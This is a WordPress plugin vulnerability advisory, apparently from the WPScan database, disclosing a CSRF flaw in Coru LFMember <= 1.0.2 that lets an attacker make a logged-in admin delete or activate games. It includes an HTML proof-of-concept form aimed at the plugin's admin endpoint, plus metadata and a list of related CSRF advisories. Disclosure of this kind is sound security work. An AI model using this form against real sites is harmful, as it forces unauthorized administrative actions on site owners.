Coru LFMember <= 1.0.2 – Arbitrary Game Deletion/Activation via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF in place when deleting and activating games, which could allow attacker to make a logged in admin perform such actions

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=coru_lfmember_admin&action=delete&id=2" method="POST">
      <input type="hidden" name="game_id" value="2" />
      <input type="hidden" name="doaction_active" value="Delete" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

No known fix

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

46dc5b8f-a6ff-43bc-a513-dc60757fa681

Timeline

Publicly Published

2022-04-27 (about 4 years ago)

Added

2022-04-27 (about 4 years ago)

Last Updated

2022-04-27 (about 4 years ago)

Other

Published

Title

Published

2024-06-20

Title

Education Zone < 1.3.5 - Cross-Site Request Forgery to Notice Dismissal

Published

2023-11-20

Title

Grab & Save <= 1.0.4 - Cross-Site Request Forgery

Published

2016-04-12

Title

WordPress <= 4.4.2 - Script Compression Option CSRF

Published

2024-07-03

Title

Nested Pages < 3.2.8 - Cross-Site Request Forgery to Local File Inclusion

Published

2025-04-09

Title

Brizy Pro <= 2.6.1 - Cross-Site Request Forgery